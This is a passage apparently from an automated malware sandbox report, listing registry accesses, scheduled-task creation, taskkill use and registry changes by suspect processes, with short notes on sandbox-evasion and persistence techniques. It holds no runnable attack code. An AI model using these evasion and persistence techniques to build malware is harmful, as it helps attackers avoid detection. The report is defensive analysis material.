\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\LowerFilters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Service DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Filters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6F64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\DeviceDesc svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exePOWERPNT.EXEWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeany.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execonfigbdzhzl.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString any.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 configbdzhzl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 configbdzhzl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision any.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5464 schtasks.exe 7084 schtasks.exe 4624 schtasks.exe 6156 schtasks.exe 5304 schtasks.exe 3712 schtasks.exe -
Download via BitsAdmin 1 TTPs 2 IoCs
-
Enumerates system info in registry 2 TTPs 64 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWINWORD.EXEWerFault.exeWerFault.exeany.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exePOWERPNT.EXEWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execonfigbdzhzl.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exehkAZQUdE7y720uA2jdtj5skU.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU any.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS any.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS configbdzhzl.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU hkAZQUdE7y720uA2jdtj5skU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 8 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4364 taskkill.exe 6012 taskkill.exe 5196 taskkill.exe 6644 taskkill.exe 1552 taskkill.exe 5700 taskkill.exe 5432 taskkill.exe 772 taskkill.exe -
Processes:
msiexec.exeExplorer.EXEdescription ioc process Key created \Registry\User\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 msiexec.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Main Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
Processes:
DrvInst.exemsiexec.exemask_svc.exesvchost.exesvchost.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs mask_svc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople mask_svc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\DeviceLicenseUpdateFailureCount = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02lrqqzjiojuqmiq\DeviceId = "<Data LastUpdatedTime=\"1626948653\"><User username=\"02LRQQZJIOJUQMIQ\"><HardwareInfo BoundTime=\"1626948652\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"1\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02lrqqzjiojuqmiq\DeviceId = "<Data LastUpdatedTime=\"1626948653\"><User username=\"02LRQQZJIOJUQMIQ\"><HardwareInfo BoundTime=\"1626948652\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"156\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates mask_svc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordLength = "8" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption" DrvInst.exe Key created 